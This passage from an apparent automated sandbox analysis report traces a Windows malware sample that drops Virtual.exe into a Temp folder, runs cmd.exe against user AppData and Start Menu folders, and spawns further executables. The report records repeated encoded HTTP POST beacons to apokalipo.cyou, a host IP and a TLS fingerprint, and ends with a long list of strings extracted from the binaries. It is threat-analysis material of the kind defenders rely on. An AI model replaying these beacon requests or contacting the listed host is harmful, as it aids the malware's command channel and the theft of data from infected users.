                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666649E4 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,2_2_666649E4
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 4x nop then push ebx1_2_6E244630
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 4x nop then push ebx1_2_6E244630
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: apokalipo.cyou
                  Source: global trafficHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2YutgContent-Length: 53Host: apokalipo.cyou
                  Source: global trafficHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2YutgContent-Length: 208Host: apokalipo.cyou
                  Source: global trafficHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: apokalipo.cyou
                  Source: global trafficHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2YutgContent-Length: 53Host: apokalipo.cyou
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: apokalipo.cyou
                  Source: unknownHTTP traffic detected: POST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: apokalipo.cyou
                  Source: KClGcCpDAP.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
                  Source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202727575.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2211577219.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219967891.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://relaxng.org/ns/structure/1.0
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://relaxng.org/ns/structure/1.0allocating
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                  Source: KClGcCpDAP.exe, 00000000.00000003.1728770025.000000000135B000.00000004.00000020.00020000.00000000.sdmp, KClGcCpDAP.exe, 00000000.00000002.1729145495.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://virtualbox.org/firmware/VBoxEFI32.fd
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVB
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://virtualbox.org/firmware/VBoxEFI64.fd
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://virtualbox.org/firmware/VBoxEFIDual.fd
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.???.xx/?search=%s
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003CFD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003B5A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221794602.00000000025B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.innotek.de/VirtualBox-settings
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html....................D:
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.com
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.de
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: validPower_Lnz_x64.exe, 0000000A.00000000.1977816040.0000000140156000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.surfok.de/
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.virtualbox.org/ovf/machine
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificat
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized
